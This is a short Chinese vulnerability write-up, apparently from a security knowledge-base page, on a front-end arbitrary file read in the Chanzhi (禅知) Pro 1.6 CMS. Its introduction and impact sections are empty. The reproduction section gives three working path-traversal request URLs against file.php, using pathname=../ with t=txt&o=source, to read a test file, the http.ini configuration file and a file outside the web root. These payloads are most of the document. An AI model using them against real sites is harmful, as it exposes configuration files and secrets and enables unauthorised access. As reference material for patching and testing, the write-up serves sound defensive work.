001-禅知 Pro 1.6 前台任意文件读取

# 禅知 Pro 1.6 前台任意文件读取

### 一、漏洞简介

### 二、漏洞影响

### 三、复现过程

在网站根目录C:\xampp\chanzhi\www新建一个测试文件test.php

![](/static/lingzu/images/15897246284877.png)

执行payload查看文件内容:

“`bash
http://url/file.php?pathname=../test.php&t=txt&o=source
“`

![](/static/lingzu/images/15897246455810.png)

执行payload来查看程序的配置文件:

“`bash
http://url/file.php?pathname=../http.ini&t=txt&o=source
“`

![](/static/lingzu/images/15897246615371.png)

跨目录读取文件(前提是有目录权限):

“`bash
http://url/file.php?pathname=../../bin/php/backup.php&t=txt&o=source
“`

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容